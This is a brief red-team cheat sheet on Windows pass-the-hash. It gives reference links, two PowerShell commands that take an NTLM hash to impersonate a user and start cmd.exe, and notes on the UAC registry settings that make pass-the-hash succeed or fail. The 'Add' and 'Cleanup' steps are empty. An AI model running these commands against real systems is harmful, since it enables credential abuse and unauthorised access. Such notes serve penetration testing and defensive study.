Pass-the-Hash

• https://www.n00py.io/2020/12/alternative-ways-to-pass-the-hash-pth/

NamedPipePTH

• https://s3cur3th1ssh1t.github.io/Named-Pipe-PTH/

• https://github.com/S3cur3Th1sSh1t/NamedPipePTH

• https://github.com/S3cur3Th1sSh1t/SharpNamedPipePTH

Impersonate a user with Pass-the-Hash for local actions (network authentication does not work with Impersonation Token, only with Delegation Token):

PS > Invoke-ImpersonateUser-PTH -Username snovvcrash -Hash fc525c9683e8fe067095ba2ddc971889 -Target localhost -Domain . -PipeName mypipe -Binary C:\Windows\System32\cmd.exe -Verbose
PS > Invoke-SharpNamedPipePTH -C "username:snovvcrash domain:{megacorp.local|localhost} hash:fc525c9683e8fe067095ba2ddc971889 binary:C:\Windows\System32\cmd.exe"

Can be used for authenticating in SQL Server management tools (%PROGRAMFILES(X86)%\Microsoft SQL Server Management Studio 18\Common7\IDE\Ssms.exe) and accessing DBs with SQL admin hash, for example.

PtH Notes

• https://offensivedefence.co.uk/posts/ntlm-auth-firefox/

• https://sensepost.com/blog/2023/protected-users-you-thought-you-were-safe-uh/

User Account Control

• https://www.harmj0y.net/blog/redteaming/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy/

LocalAccountTokenFilterPolicy & FilterAdministratorToken

If LocalAccountTokenFilterPolicy exists and is set to 1 (doesn't exist by default), remote connections from all local admins are not affected by UAC and PtH will succeed:

If FilterAdministratorToken exists and is set to 1 (doesn't exist by default), builtin local admin account (RID 500) is affected by UAC and PtH will fail:

Add:

Cleanup: